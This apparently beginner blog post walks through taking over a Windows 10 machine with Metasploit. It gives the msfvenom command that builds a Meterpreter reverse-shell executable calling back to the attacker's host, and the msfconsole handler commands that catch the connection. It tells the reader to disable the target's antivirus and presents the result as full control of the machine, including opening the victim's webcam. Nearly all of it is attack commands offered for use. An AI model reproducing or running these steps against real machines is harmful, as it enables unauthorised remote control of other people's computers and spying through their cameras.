Exploiting Windows 10 using "msfvenom''and "msfconsole''

 STEP 1 :- Go to the Kali Linux terminal and type the following command as shown below:-

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=your IP of Kali lport=8080 -f exe > exploit name.exe


STEP 2 :- Now the exe file is created so move it to your target machine (NOTE:- TURN OFF THE ANTIVIRUS TO EXECUTE THE FILE).

STEP 3 :- Now type the following commands as follows:-

msfconsole

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set lhost your IP of Kali 

set lport 8080

exploit 




STEP 4 :- Now click on the exe file from your Target machine .

STEP 5 :- Now you can able to see that session is created in Kali Linux .




STEP 6 :- Now you have all control to your target machine which is windows machine in our case .

STEP 7 :- I have shown you example by opening webcam of target machine .





STEP 8 :- You can also use different commands to operate the target machine . To know the different commands type help and you will get all commands listed .

That's it from my side .Thank you😊



Comments

Popular posts from this blog

Snort Installation & Configuration in Kali Linux

Exploiting Android using "msfvenom'' and "msfconsole''